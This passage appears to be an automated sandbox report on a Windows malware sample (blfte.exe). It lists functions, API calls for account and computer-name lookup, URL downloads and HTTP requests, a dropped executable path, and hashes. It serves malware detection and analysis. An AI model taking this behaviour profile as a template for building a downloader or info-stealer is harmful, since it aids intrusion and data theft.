                                                                                                                                            • ___initconout.LIBCMT ref: 00420A78
                                                                                                                                              • Part of subcall function 004209F0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00420A1F,0041DE7C,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A03
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,?,0042CEB8,00000000,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A8D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction ID: a013aed45aa20be437475b0026bfe262562a16a8948ae9efbea31755940ae5c1
                                                                                                                                            • Opcode Fuzzy Hash: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction Fuzzy Hash: A0F03736700129BBCF325FD5EC0598E7F65FF147A1F814025FA1885131D6318861EB9C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041AA39, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A5CE: GetOEMCP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A5F9
                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,2!A,0041A887,?,00000000,?,?,?,?,?,?,00412132), ref: 0041AA97
                                                                                                                                            • GetCPInfo.KERNEL32(00000000,0041A887,?,2!A,0041A887,?,00000000,?,?,?,?,?,?,00412132,?), ref: 0041AAD9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 546120528-1441434633
                                                                                                                                            • Opcode ID: 855e5094346b95d4b4db1da98e09477af5f802b7c2a014dd2a795b6dfe79976d
                                                                                                                                            • Instruction ID: 2fbf1acdb1644f5cebe7d70d344e6b9978f84c8fc5be97901e81be94f95da629
                                                                                                                                            • Opcode Fuzzy Hash: 855e5094346b95d4b4db1da98e09477af5f802b7c2a014dd2a795b6dfe79976d
                                                                                                                                            • Instruction Fuzzy Hash: BD511470A052849EDB21CF76C4406FBBBF6EF41304F14446FD1868B252E77CA59ACB9A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02113FA0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                            • API String ID: 0-2322989060
                                                                                                                                            • Opcode ID: a41690f532066a8b71b9e286dfa568cd4f83670d9d2d2647161a3b7c6b7cbf70
                                                                                                                                            • Instruction ID: 8f212296e9c110a0be9fd48788962f7849d87c479075583da3108dfae5c01f24
                                                                                                                                            • Opcode Fuzzy Hash: a41690f532066a8b71b9e286dfa568cd4f83670d9d2d2647161a3b7c6b7cbf70
                                                                                                                                            • Instruction Fuzzy Hash: EE4191B1A80214AFCB25DF9ADC80AEFBBF9EF89B10F550076E414A7250D7718A45CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041A825, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A5CE: GetOEMCP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A5F9
                                                                                                                                            • _free.LIBCMT ref: 0041A89D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 269201875-1441434633
                                                                                                                                            • Opcode ID: 9c2c00ac15ece1745d97c0fca12c4d45e076aae10a1d0af358e82324bd06995b
                                                                                                                                            • Instruction ID: 8fc8c036d32de9612cf7c31c04d913b2c1a5afb910598d1080d20a8abe594b57
                                                                                                                                            • Opcode Fuzzy Hash: 9c2c00ac15ece1745d97c0fca12c4d45e076aae10a1d0af358e82324bd06995b
                                                                                                                                            • Instruction Fuzzy Hash: F531E371900249AFDB01EF69D840BEB7BF4EF80314F11406AF91497291D77A9DA2CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041A5CE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetOEMCP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A5F9
                                                                                                                                            • GetACP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 0-1441434633
                                                                                                                                            • Opcode ID: 26c0676f71b8d74d44ffd1cd88890f61d5a8aa5f38128eb00bcd6bd1647cb703
                                                                                                                                            • Instruction ID: 1e92f9a8aadae32bac15e37fb92d95dc9b840e940613ad1b39aa9e2a43853cf2
                                                                                                                                            • Opcode Fuzzy Hash: 26c0676f71b8d74d44ffd1cd88890f61d5a8aa5f38128eb00bcd6bd1647cb703
                                                                                                                                            • Instruction Fuzzy Hash: 97F0AF70901104CBD720CBA5D8087E937B0EB10339F984726E465CA2E1CB75989ACF4E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Analysis Process: blfte.exe PID: 5756 Parent PID: 6780 blfte.exeCOMMON

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00401C20, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C4A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C5F
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C70
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401C93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C9E
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401CDE
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401D82
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D8B
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D90
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D9A
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D9D
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00401DA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3326663573-0
                                                                                                                                            • Opcode ID: 89de7c59b90efd946aa68e8c02d9ab6001ee340a7ba4baf79da18d253d2d0f44
                                                                                                                                            • Instruction ID: 5d740cbccbc7aecd9424c2ab973b1f5715f8ce92cc64a7cb0e2c3ceeedde85f2
                                                                                                                                            • Opcode Fuzzy Hash: 89de7c59b90efd946aa68e8c02d9ab6001ee340a7ba4baf79da18d253d2d0f44
                                                                                                                                            • Instruction Fuzzy Hash: 04516075E00209ABDB20DFA5CC84FAFBBBDEF44344F15456AE905A3250EB749E05CBA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405960, Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 376networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __fread_nolock.LIBCMT ref: 00405AAF
                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,73B76490,00000000,-00000012), ref: 00405BC5
                                                                                                                                            • InternetOpenA.WININET(0042BC85,00000000,00000000,00000000,00000000), ref: 00405BDA
                                                                                                                                            • InternetOpenUrlA.WININET(00000000,0040708E,00000000,00000000,00000000,00000000), ref: 00405BFA
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00405C11
                                                                                                                                            • WriteFile.KERNELBASE(00000000,?,00010000,?,00000000), ref: 00405C37
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00405C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405C53
                                                                                                                                            • InternetCloseHandle.WININET(0040708E), ref: 00405C62
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWrite__fread_nolock
                                                                                                                                            • String ID: jjh$jjj$jjjj
                                                                                                                                            • API String ID: 350641714-3331015499
                                                                                                                                            • Opcode ID: 0b630981fa9627350e9965ec79e37098c64b2e570c022b8a51db33c33d460db3
                                                                                                                                            • Instruction ID: b5241e12ffa7a33fb50d7e3eaeade390ea5197ff3c90035685902e4f75904cb0
                                                                                                                                            • Opcode Fuzzy Hash: 0b630981fa9627350e9965ec79e37098c64b2e570c022b8a51db33c33d460db3
                                                                                                                                            • Instruction Fuzzy Hash: 00C1F171A00108ABEB14DF65CD86FEE7769EF44304F50452AF905A72D2D67DEA80CFA8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040A680, Relevance: 14.4, APIs: 5, Strings: 2, Instructions: 2110libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403C30: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                              • Part of subcall function 00403EE0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C4A
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C5F
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C70
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401C93
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C9E
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401CDE
                                                                                                                                              • Part of subcall function 00401C20: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040B09A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000002A8), ref: 0040B0F4
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040B0FF
                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0040B134
                                                                                                                                            • GetComputerNameExW.KERNEL32(00000002,?,00000100,00000000,?,?), ref: 0040B214
                                                                                                                                              • Part of subcall function 0040DCC0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                                                                                                                            • String ID: 152138533219$6b3c86
                                                                                                                                            • API String ID: 1144133639-628519087
                                                                                                                                            • Opcode ID: 95e28c648446f8a4c3e38be0dff2fef44dd8b7fc49f26627ed11bc9581090eca
                                                                                                                                            • Instruction ID: a50882f3c91e2f3519d9ee2b34ae7763fa0d2aec9cf4117b6005d93e6a3dbef0
                                                                                                                                            • Opcode Fuzzy Hash: 95e28c648446f8a4c3e38be0dff2fef44dd8b7fc49f26627ed11bc9581090eca
                                                                                                                                            • Instruction Fuzzy Hash: 27F22971A101048BEB18DB38CD8979DB772AF81304F5086BDE449B73D6DB3D9AD48B89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041CAB7, Relevance: 13.8, APIs: 9, Instructions: 273COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041C770: CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBCB
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBD2
                                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 0041CBDE
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBE8
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBF1
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041CD5E
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CD90
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CD97
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4237864984-0
                                                                                                                                            • Opcode ID: 086fc97678eea2fad24bc7c201904c66549437a90376fd9f68936f3440ed3576
                                                                                                                                            • Instruction ID: 9a888166caf7c729a04a6387afd24b78d2efbf651294ef369ed2e80490bd9623
                                                                                                                                            • Opcode Fuzzy Hash: 086fc97678eea2fad24bc7c201904c66549437a90376fd9f68936f3440ed3576
                                                                                                                                            • Instruction Fuzzy Hash: 13A14832A441448FCF29DF68DC91BEE3BB1AB06324F14016EE815EB391D7389C96CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040B030, Relevance: 13.6, APIs: 5, Strings: 2, Instructions: 1345libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403C30: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                              • Part of subcall function 00403EE0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C4A
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C5F
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C70
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401C93
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C9E
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401CDE
                                                                                                                                              • Part of subcall function 00401C20: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040B09A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000002A8), ref: 0040B0F4
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040B0FF
                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0040B134
                                                                                                                                            • GetComputerNameExW.KERNEL32(00000002,?,00000100,00000000,?,?), ref: 0040B214
                                                                                                                                              • Part of subcall function 0040DCC0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                                                                                                                            • String ID: 152138533219$6b3c86
                                                                                                                                            • API String ID: 1144133639-628519087
                                                                                                                                            • Opcode ID: c33031ae180835dae0bff8f9e09d069ed3fff2cc7b86e240bf9c7db71d63a360
                                                                                                                                            • Instruction ID: 0b6ff0a0954d373cd1ca9f0cb650152324f6a3374e6b8b5f594f88d3717f35ee
                                                                                                                                            • Opcode Fuzzy Hash: c33031ae180835dae0bff8f9e09d069ed3fff2cc7b86e240bf9c7db71d63a360
                                                                                                                                            • Instruction Fuzzy Hash: 73B2E771A1011487EB18DB28CDC979DB736AB81308F1086BDE449B73D6DB399BC48F89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0222003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0222024D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                                            • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                            • Instruction ID: c60c71ee933c1389f6d2bca79351508ad14692a5fb28b8474d134f3abc3ef555
                                                                                                                                            • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                            • Instruction Fuzzy Hash: A5527A74A11229DFDB64CF98C984BACBBB1BF09304F1480D9E50DAB355DB31AA99CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041D631, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • W. Europe Daylight Time, xrefs: 0041D914
                                                                                                                                            • W. Europe Standard Time, xrefs: 0041D8E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                            • API String ID: 597776487-986674615
                                                                                                                                            • Opcode ID: 7b94b24873c4896f8d575fb176e7bbd29f6f7452a1ec856b836a30c5cd7989d0
                                                                                                                                            • Instruction ID: 288546b534604ff02d250860d8c74b002ea5c89fcf63bb1af3282de747a45e08
                                                                                                                                            • Opcode Fuzzy Hash: 7b94b24873c4896f8d575fb176e7bbd29f6f7452a1ec856b836a30c5cd7989d0
                                                                                                                                            • Instruction Fuzzy Hash: B0C127F1E00204ABCB24AF79C841BEA7BB9AF45314F5440BBE4A597381E7388DC6C758
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004041F0, Relevance: 11.1, APIs: 7, Instructions: 563COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                            • Opcode ID: 4bdeb77560c12209c4da8c473609ec2336c9e7b4959ba9b27ce8a68a06bba40a
                                                                                                                                            • Instruction ID: 4cdd825c375485f2e1a2f9f5a6d0633131526c326083d4a5a7490bc1e288c697
                                                                                                                                            • Opcode Fuzzy Hash: 4bdeb77560c12209c4da8c473609ec2336c9e7b4959ba9b27ce8a68a06bba40a
                                                                                                                                            • Instruction Fuzzy Hash: CD12E170E00209ABDF14EFA8DC85BEEB7B5EF84308F10416EE505B7281D7796A45CBA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405322, Relevance: 9.7, APIs: 6, Instructions: 678COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 0040535F
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 004055AD
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 004056D4
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 004057FB
                                                                                                                                              • Part of subcall function 00403C30: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00405486
                                                                                                                                              • Part of subcall function 0040DCC0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile$Concurrency::cancel_current_taskPathTempVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 265149320-0
                                                                                                                                            • Opcode ID: cc20f9adfd21fa6639be6bf90fd0914603b315c918c7585fde145399a53ef4ee
                                                                                                                                            • Instruction ID: d7e9fdce9f2f4267082e00e7a35303825114a1207d7088fc6bbae6c60a8a83a5
                                                                                                                                            • Opcode Fuzzy Hash: cc20f9adfd21fa6639be6bf90fd0914603b315c918c7585fde145399a53ef4ee
                                                                                                                                            • Instruction Fuzzy Hash: 37222671A101049BEB08DB78DD8ABAE7A22DF81314F50463EF405B73D6D77D9A808F99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407BCC, Relevance: 9.5, APIs: 1, Strings: 4, Instructions: 751COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00408589
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTempXinvalid_argumentstd::_
                                                                                                                                            • String ID: "$152138533219$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 3948722134-3600082259
                                                                                                                                            • Opcode ID: b71a55627c11012d3abeddd1b9be3c478d0027df3763f0c627c800d7d672ef3d
                                                                                                                                            • Instruction ID: 4d7578ea1bfddb69caa85ecc011d646bcc4366cd91bd29e54d5c208aa66e75cf
                                                                                                                                            • Opcode Fuzzy Hash: b71a55627c11012d3abeddd1b9be3c478d0027df3763f0c627c800d7d672ef3d
                                                                                                                                            • Instruction Fuzzy Hash: FC420671A1010897EB18DF78DE8579D7B62AF81304F10862EF449B73D6DB3D9AC48B89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405E54, Relevance: 9.2, APIs: 6, Instructions: 227networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,?), ref: 00405EDC
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 00405F6D
                                                                                                                                            • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 00405FF4
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00406005
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600A
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$FileRead$HttpRequestSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 253740277-0
                                                                                                                                            • Opcode ID: 702c96e9c5206198a706ee0e9cd341176f09ce957ef8bd45b626cced7106a3ce
